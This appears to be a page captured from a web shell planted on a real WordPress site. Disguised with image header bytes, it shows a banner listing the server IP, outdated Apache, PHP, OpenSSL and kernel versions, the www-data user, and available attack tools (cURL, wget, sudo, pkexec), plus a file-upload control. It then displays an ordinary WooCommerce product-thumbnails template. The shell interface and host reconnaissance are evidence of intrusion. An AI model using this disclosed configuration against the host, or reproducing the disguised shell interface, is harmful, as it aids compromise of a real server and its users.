????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.128.153.31 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/www.astacus.eu/wp-content/themes/Avada/woocommerce/single-product/ |
Upload File : |
<?php /** * Single Product Thumbnails * * This template can be overridden by copying it to yourtheme/woocommerce/single-product/product-thumbnails.php. * * HOWEVER, on occasion WooCommerce will need to update template files and you * (the theme developer) will need to copy the new files to your theme to * maintain compatibility. We try to do this as little as possible, but it does * happen. When this occurs the version of the template file will be bumped and * the readme will list any important changes. * * @see https://docs.woocommerce.com/document/template-structure/ * @author WooThemes * @package WooCommerce/Templates * @version 2.6.3 */ if ( ! defined( 'ABSPATH' ) ) { exit; } global $post, $product, $woocommerce; if ( ! Avada()->settings->get( 'disable_woo_gallery' ) ) { include WC()->plugin_path() . '/templates/single-product/product-thumbnails.php'; return; } $attachment_ids = $product->get_gallery_attachment_ids(); if ( $attachment_ids ) { ?> <div id="carousel" class="flexslider"> <ul class="slides"> <?php // From product-image.php if ( has_post_thumbnail() ) { $props = wc_get_product_attachment_props( $post->ID, $post ); $image= get_the_post_thumbnail( $post->ID, apply_filters( 'single_product_large_thumbnail_size', 'shop_thumbnail' ), array( 'title' => $props['title'], ) ); $attachment_count = count( $product->get_gallery_attachment_ids() ); if ( $attachment_count > 0 ) { $gallery = '[product-gallery]'; } else { $gallery = ''; } // Avada Edit echo apply_filters( 'woocommerce_single_product_image_thumbnail_html', sprintf( '<li>%s</li>', $image ), $post->ID ); } else { echo apply_filters( 'woocommerce_single_product_image_html', sprintf( '<li><img src="%s" alt="Placeholder" /></li>', wc_placeholder_img_src() ), $post->ID ); } $loop = 0; // Avada Edit $columns = apply_filters( 'woocommerce_product_thumbnails_columns', 3 ); foreach ( $attachment_ids as $attachment_id ) { // Avada Edit /*$classes = array( 'zoom' ); if ( $loop == 0 || $loop % $columns == 0 ) $classes[] = 'first'; if ( ( $loop + 1 ) % $columns == 0 ) $classes[] = 'last'; */ $classes[] = 'image-'.$attachment_id; $props = wc_get_product_attachment_props( $attachment_id, $post ); if ( ! $props['url'] ) { continue; } $image = wp_get_attachment_image( $attachment_id, apply_filters( 'single_product_small_thumbnail_size', 'shop_thumbnail' ), array( 'title' => $props['title'], ) ); $image_class = esc_attr( implode( ' ', $classes ) ); // Avada Edit echo apply_filters( 'woocommerce_single_product_image_thumbnail_html', sprintf( '<li>%s</li>', $image ), $attachment_id, $post->ID, $image_class ); $loop++; } ?> </ul> </div> <?php } /* Omit closing PHP tag to avoid "Headers already sent" issues. */